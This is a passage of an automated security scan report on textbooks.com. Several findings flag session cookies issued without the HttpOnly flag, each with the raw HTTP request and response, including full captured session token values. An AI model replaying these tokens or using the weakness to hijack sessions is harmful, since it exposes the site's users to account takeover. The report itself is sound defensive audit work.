Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:51:57 GMT
Content-Length: 25374
Connection: close
Set-Cookie: TBSESSION=1pesYoGAQove8asXg%2FLQi3Odk%2FALvaMYWu4u5JdrXTswRUYUKJvQ7xvzZDAfEgGZUlgQdk0f2GecdTZ4qhGUXZ0yT3xlVp3q%2BMehNWH1ykufc%2BUXdB3NVfdJrrjBDK8gumhqKLWu0AnbdX5fvbqtoQjunBi75eZszh1B7jF6RpGjFzW%2FNuQqdz2nzK0VFeUkFOtMW95SAVCwyyverIx0vCc9sE%2BC6dFtzuJ2AH624CJYm8cPTMeM0L%2B6WDvSzbNQJIYrc0pCKK6mSWoArebTZiGaIOpXIf3AtesREiYJRduH1CUhC3mMZWjnPPGKgLkRJdbQLTZw1sZ7XT2aZCMkGa3ru5%2FagVViWzzbpVRxz%2FgKx7QSWWbAGBRHVhNtmnVpxVB3gwMjKydAeKz2mzXmakCZnc4XzhAnvipACD6WTEgoNZ%2FbV5n%2BWrkaPUnY02ky7ylalmqoOcyNbCApYgIvT1h5ATGTLViVs3A4Nxsv7T%2FLMELKk0XheRpXRtLixaAlRyVESWhMQqVk3NALmjFRs90VKA2rh3UFDYhO4e1NrU2%2Bi1mPTJeGYCrWhn2n8MlWUJgr62VVmrWzAWjobClto930h9w7p2W2gdHmydwE92UJMgUJdgIXK9tW3WK6u5anDGcM21gakIejWSQX0ziA8yOuynqIz5zNX4eZcZ%2FAVB3qJomp23e5A8Bq9W1GhI4EPhI3P92ddZL7zzWteX5IDod8B1KeMXNBbl8b4mhv7USPcWWdEiN7ZS9GeuomkLCMhlL0t0dS%2FQoJZAcOihkYy8Bh0Nb94Ar6S0hqAJMe4dmtIdqUITjELDtLPcmlnT%2BAQ04mgLrjehopCBnaiiJh1du7AHiopQapjoXiBm2N47DxuhFiZoagJcXo8P%2BtzRC8sCJjE1cXBPdnaAaxmkoOuuIqWLVV5w6dmg0GPNXOZM9F0X0vnhLmmom343SLzQyKw2QZUQt0mXnbfYPnQFpVNp%2BLxYCo%2FcE5oeGmLUkcpb%2B0Q2KBD5UMGw%2Bjb6ZYk0aojaqDdriVkm2IFGMy1Oy0gRoshgDlx2C%2BWtaKoQStdj4FFACl2chT6cW0ouSCrUX5PBzyp9cF9csPIOqFYV3vvXKHHkkjkAPHQ66Te0TdZi6FQy1j17BXSBQWewkrg9jE9yJtidLhlgOuW0RXxm0vxtxyk5MuiBkZ23izbuw7yqvEbGfnmCfVWKeYcNlE3m7jbAJH420GPadN%2FNAKWG05sDaKuyNbdl7uGyqOJO7ewKXblbDdrq%2BuxmgEj3E%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=KMxvh%2F01XScLHyvOudc%3D; expires=Mon, 26-Dec-2011 13:51:57 GMT; path=/; domain=.textbooks.com


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.6. http://www.textbooks.com/Catalog/A/Agriculture-and-Animal-Sciences.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/A/Agriculture-and-Animal-Sciences.php

Issue detail

The following cookies were issued by the application (see the Set-Cookie headers in the response below) and do not have the HttpOnly flag set. One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/A/Agriculture-and-Animal-Sciences.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=IyVuCqYuAWRptohxdfBhEwi0m%2ByBINgd5n6P0FIbcFqpmFLzV1mhy69WGBLhGH%2BRENyUVFCGInw8HUIU%2Bg6OUg9hFzrlYo5Ammn1QoPOILU4kXdaracKHVPT%2BOYr9m8C2B6R6%2FaQpqtkkdxkqR%2BRRU1G02%2BCZE0ZG5hSK9jsRP%2FsnDBjxsu%2BEhDjZzUjdSVwbHDxjHoevpr6GIUVRo163cSyh6jISraIqhEni5kZMH1iX2dujVQfo5VHnyQoSHbpspzTsHqouDJhpr3dlNJB1GcwDlfyR4Jm4cWvzinzcPwnAQ5Tj8w6HY7dJOacd%2F9qhZuo27w3FDBOZDEeuilokoiSW1YRYGr1EXuNON%2BGcUXLGQwYJ%2BqvFrFQAVI%2F2fWEgN58JlrncGg6Lsty%2BuoSxFPiVE05XwurJJ%2BEaX5zfXcbvFJrJglFGYDd5VmMTdqZJsf%2BcaGfP72PjXsIjPv0kLLQBLpT%2B%2BZ%2Bryn9DzDahPy%2FrrMy91jFH5Ig4Sv7mF%2FmoxYrK6UkRz3yQMcAVStWgfp1ULZ92IDOZYwXaNqn5hRgxCYQRfRpyx9Sw6%2Bp1K%2FBISiRto15j5ewiXjKtCKFbgeRCXksJ3rq7w3%2B2%2Bug2tAyWuZkbxdZ8kh4SsHHv1pfieN%2BtkTG0kd19Qg2S2%2F%2BpQm%2BSauQ0KCRThiA6hzkd%2FMl7%2FNxK6pWI6kVjuun96kA6gcfTE7aw1xxY48ZOsxWfSffkqXL9ohW%2B%2B8CB%2F%2FBYup3v1fwHsF54WRA0V7wxRr7rrwl8JQ%2FR0dG17xDyn%2FI4VWEXCroQYsQqV%2BXkFdpCGYOONkbdJTCXpzh5Pr0%2BDQ3MOmKG7uR%2BEmpDjO6mP1%2Bp7keOPZFGYjDb1ACSBvYBbWUYmvI6fhOIZJAZCx49nVBiKS9JG5H4FRZPFw9iwh5%2FABth0gvtxBeU52MdVkNc2x%2B%2BjpWxxwHsI3pdabQM79nqHP0VZn36dNnyCWF10rkOpKnzdwBKwAcuMMqtywxHUejZeF2BQ%2BCfS9gJKL7VSkwEEpNko2I6qIdKCi5oSbUDcOr26DJ7INnKnuTqbR%2B5xOA0cRFdiV7QjxacrFzAILYLRww7vI7ljvxXqGfUmV6ZJk8Bu1ZqbHBB%2BoQFNdluxujPmVG6AClGRGImYFqDom7TovsCaSlGu%2BBlqxtsgGv5wNOUD23TwizdTImIrrgTYMAPvIp%2F62v%2BgVUpd2RVqgqDqOUZHZdeLhOpTHZ%2Bo8NW7nDo3cuReUYCCRnU1x0zJiKQUVP%2FqTIeVQ6aek%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=5lanJ%2BfFuYAsp73%2FIYk%3D; expires=Mon, 26-Dec-2011 13:52:01 GMT; path=/; domain=.textbooks.com
Content-Length: 132548


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.7. http://www.textbooks.com/Catalog/B/Business-and-Economics.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/B/Business-and-Economics.php

Issue detail

The following cookies were issued by the application (see the Set-Cookie headers in the response below) and do not have the HttpOnly flag set. One of these cookies appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/B/Business-and-Economics.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:08 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=yLw4NO06c6Ga7KUhlK5wiP992BOqjFKWOhemXEGhBc6V5AGLwU8DWmOwL2UoJzpcQNxL%2F5haD9piZhrh2Q1uaWUTwfZn93cBIL4bgpGL3t%2B%2FvFzFkMPADykRoFsjYiz7EgOqlMOUTgHREi2i7SwIWdU7Em6XFwzgeQlJ8Ys8M3AiesvsRvufPDd4EWa1lHTTRJ9NbRq2lJ5wMP0GIrLyJc0mnDfPRYY%2Fe1RDdHvzuoIXOXUhisbL2H7RvO7st4N1Cxs%2BGOPAwso4h9e28UUnqRADqKNKw%2FBqQKlVtPkBRfltVsXOaDHWE5LMK7S8y5bR6cRhuCb8aBb5kAX3tLNw4O3wNKgM2aPkr%2FD52c13ZdKXwf0s4hpRQlLzdLrT53vaaZ%2F3I4cuWw9X9hn6xwWxrKLS%2F2Elk28ccN6mZ1RTAGMczm2ArnzVfmfZUKGYYGsYVF00i1bnzMtzZQ8TEW0iZju4PT4qx%2BL37rqgOhFNT3g7OrXtVDDWQBLY4prxY10sRwKWpP7Uo9TMspLZTAZLS9Nbg7AtlVq5hFEHqwhEKbwN00o%2FvB%2FnfDrCLv2NaZIw3KfAiA%2FwsFe8Y4EHiSlp46tiZiG2O7r271jW95pqfqm5jkBhWpv2DFCowX%2BZ5uwsWtM2HdGDt0nhNMLsqzoSAkNBg01jRa%2FCM7lfvqAzsU62F2UdeQZkAYEONskjmPviQK9oRRvsBRvuZTET0dj2iuumIMnuZk0fKZDCU5AwPUyGnIyeHwOtj9mEL53hUUS47nbP0FwmxRshcQG5N6kV%2B7WSibTCG1gRKaWIAwgfMBiPx%2FhbnbA%2B0i%2B6M%2FbQimIf1oLeVvNvMATITrwxNhLr1zZLvDoAFrB83lJzm%2BR5xCx2w8V0PTZQKCsF%2F9VzZmCBCPmh35EWoiE5WBEgSWCIdw6oqwb24yEPnuwGC7YBUeXy83gW1NlGTcv6X8NrKQJPB8aeLwKghDVnjpJme1%2FmxDZAZHtZn8PeCJ39LCPqRMI4lxwhJHxpEuV%2BLpHNlbv%2BjWk%2FROHyImna5RNnYFWgkKAd9U%2F3zuqN0p5%2B5mhePHCZcsmd5rU1fs%2BADbu0wuiiR7AMNit3NSZNW5V46XGCHVnVKDUwhgchZ%2FAYr1U%2BR37uOI3nO8vqMlWcqmD7c%2F2MIYmmezSAGvCRI6tj7swTXEioQMDEQuZ6ndNCFPuKtaRL0gNyqSUfDnVTxkbOulYihWyRjAaIDNt85QZwkoaT5PGiGabeP%2FSoKFfxKp%2FxdUf5VaQmEF4UjE0%2FJ%2Fk%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=Po61YNkCwF%2Borj5Wwmo%3D; expires=Mon, 26-Dec-2011 13:52:08 GMT; path=/; domain=.textbooks.com
Content-Length: 100118


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.8. http://www.textbooks.com/Catalog/C/Communication-and-Media.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/C/Communication-and-Media.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/C/Communication-and-Media.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZaWEYD3x8Z5r4A4meXgSOALUcFLCPRBAL6slY%2FmDWgyWiOHD6rPc%2BgJtW9zzO3%2FlKNMIUiK6YbXihNQm7ZFnjwbntIguJ2AKqbJ6gVwI5TZRnAlt6OA2ML5Md7THJYZgh8kfZpiMPyAItBRlsmEsC%2BSZJ7Yz0TuiHodfhuTxj0hbAIn5eroEArXgkibGoe1BbXemnpZlEDU%2F3GqR310UDZrXuVYANirwEyI0CEvL3kSqfj64BJDWvMJB6figl9OG%2FvZPQAukhMu3%2BT%2F9YjLELj07YYMBR4RCpGuRLL5HYnKME1cgXYeREI7bVYBS9vBSAWpkcaD9bp8HO%2FGQ9Cik9gqou%2FBuI1UsNEboFbFvScGY%2BZXXrY9svey%2BHnUm8C1BEURYCXO3oYboqdtw4gDspHG71QGhBFRYizRrCiCKS%2B6GHF0BCN2KdVq0%2BBEP8ndy1%2FnZEITezF0Uv0Gfipa2oLDAcnK1d9dVxtj%2BYji7uoLcIQO6mSVIbSp8gEOrXBG5CrZtCIxVM%2ByXQFmRPWoEekURTtA3cvGDIyWqfAGrxhWfbmn1wPFHgAfb1ffwVfKOsXPHi2M25p0On%2BeiQ%3D%3D; 3PT=SER%2F%2F%2F%2Fbecome%2F%2F%2F%2F9780805853223U%2F%2F%2F%2F; BNG=deleted;

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.13-pl0-gentoo
Content-Type: text/html
Date: Sun, 26 Dec 2010 13:52:09 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: TBSESSION=GflvJakRFJaZHar64sgfpixyIJizFExoPvfubgEHX74mYNU9eYfkv2DS85usjXepowH7reKOL%2BzuU3joe9lQtqX5NQlUHVGyTiem7A03mPnPgmg3KMEU6EzBsoaym9p2wfAUdQtkAY%2BhrpqX5Oxliu9VLNMVseOUaRftoQ%2FSlTCuRYK5hNVeDGGW9nd0pgUPotohkcrUveC085TRLxGNs8FcPElxfraVMuyracMhCpfrxeYg7KSDOzjBOMT%2BIQlW%2FwYIo8o3zGO2CNXIp4JQFijjBjEYTe0CbgfPZomv6QWWdNgdJf%2BxPuLFPH5mdkOE5mEdaZ%2FBSctcu21fqkZPBLkAd6tpM4fR5B9pKhsJM24yxnXvtMHlIJwxObKX912Wx8xcgOn6VmtRdrZUYDyKuENQQDyqwjXIa9D3JVdhUn%2BzflRaRo8s0ZP359TMfNN9k7oPCiS74%2B72KcLoW59DsNpQ3E0ATOUbp32lHoFOUq5LnNgJZbuQ3b8SZFymlG84sgEmaaqG1iMncLSqLlDxJB717qYuTWhD%2BVDgpY9gaK2NLogL4SI8%2FbJQDRVFjytQGdliajuLFgZLG5%2ByeXRRVaq6Db7w%2B6i4EgdIpIFZBs5BDNPLMTpHNwU3Cs8lhxE0vhX6YWX56fFr7mnBBmcbjhLgkHsJbsgJ5keVXHcIl0ELQK08WDby19mFIQjqaSVeb11QKD8ow27Bl1%2B1wH6O%2FOSlWDknFM4OfqtKpdUNq6kAyT%2Bld%2FTcyCWHrTpZNct6knZUXJh7Yk8S9bW3saCm0nJw%2Bh6D9mYO8UEtEzLM9VBmZmpVLZb7RIzez9kOlae9Hs%2B4PRlybJf8qtmqgfVzEjvt2z3sjH6bMoTiBlI0YoH5N6u7eux927Er64xNz2Od23ubQbsIWoh6kSPyhm104Vl06jjvMnsZo3%2BheDsiKiPKGx1Q7fmf98TH%2FVKzM%2BM6KOMbeRswvPk5KYoxjtZ2le%2FPw%2BVXot6ByHfv%2FDwy5m5lf6h5WLD%2BHIiXaTS6mr30ISUba34baGYm0EXzmo%2Bxpy73LARAWIIM8rLdxX%2BOlvvRYYjayWKApEY9kRkNSQFGtCnTTPZ%2Bz1kdD9o0gvjv8y0SWCSTN2bBl7F30PmpNGu5vgPi7vcMsAoISW2OiA2Iuog4j5Rxzm7Yjhg5GXlAzI%2BSXK9WI6clxDFUD1RkSWm2D0CZKO83%2BWP5BJ8zoMPMM2fdMJOIzdYEWPoJEgD1nO%2BOrZrqKIbbRGvFZY%2F7LF0z6uZyz%2BSLGgYtqi0%3D; domain=.textbooks.com
Set-Cookie: TBPERSIST=ypV4xbizAJKCvg8uCNg%3D; expires=Mon, 26-Dec-2011 13:52:08 GMT; path=/; domain=.textbooks.com
Content-Length: 122719


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">

<head>
   <meta name="keyw
...[SNIP]...

4.9. http://www.textbooks.com/Catalog/D/Computer-Science-and-Technology.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.textbooks.com
Path:   /Catalog/D/Computer-Science-and-Technology.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Catalog/D/Computer-Science-and-Technology.php HTTP/1.1
Host: www.textbooks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_cc=true; __utmz=129724553.1293371048.1.1.utmcsr=become|utmccn=(not%20set)|utmcmd=shoppingengine|utmctr=9780805853223U; s_sq=%5B%5BB%5D%5D; TBPERSIST=wgVJbswvY6sMFGGM9nQ%3D; __utma=129724553.1653818769.1293371048.1293371048.1293371048.1; __utmc=129724553; __utmb=129724553.1.10.1293371048; TBSESSION=37ReU5cPSBNoboUvNrKSSPdJqag4zJ4hB17oVZ0Xg6KkWBmfRSereRQKWjV0tZaE%2FOxhAj1ln%2BnUy2WhPhV0SpHG6RQRagTw4oEFuNHk1bc%2BKqsqBr9eujS3WLZiJaH7iXWaHqhcnuPk%2FG0Ruse1resjg8WK5EzVgJ%2FiYEO62zesG0po8zvhaoVt%2FM%2Ff7dTnxdb4xZn6q7rq0g3xgYDMVa82cGBo9lXkDFSZPfbppAn9wa7cYf1us%2B5mz3oR0hrZwoupRs0JHMuSawQf9%2F%2FYtKRxtAuyIkQWCcb%2F%2BthBCnhAwfOX8KTnv3%2BVsAgmc6Rgj%2BIbg4bNed6r%2BBiK1eA%2BWd9zG1wcMfawaWVD0DQsKW%2BF0QamK3tgExLnv0Cl%2B%2BIPDuJwl3DfHVR6hMg9q13WuYCGtzjj4XNlQZrUOsSHEjqNDupLzkE7o2fncVPPU1M6UW9%2BB9bGOLWhymJn038uI0ZBeFsepxaLtRDnMSCuwtEnUJLZs%2BU%2BKQStifr7dTbsUGjqrMn0MMLacRNPdRQ9XUwhba%2BcqRyBk68geRBB1%2FHr36SIe1sSyUAEisxWeMTLvz4yenEb6IHfUpWjLwvMXvtpLK3LGRZI8exu0fc%2B%2BOsYZwDNqeipA%2FQ7hbPvT6d79g0eGbWX7DwFmIBC5dXgLsAizEiftDg42D7KIBZSymF4hXYk90AS8E6i8nwhLIhmH8nFoZa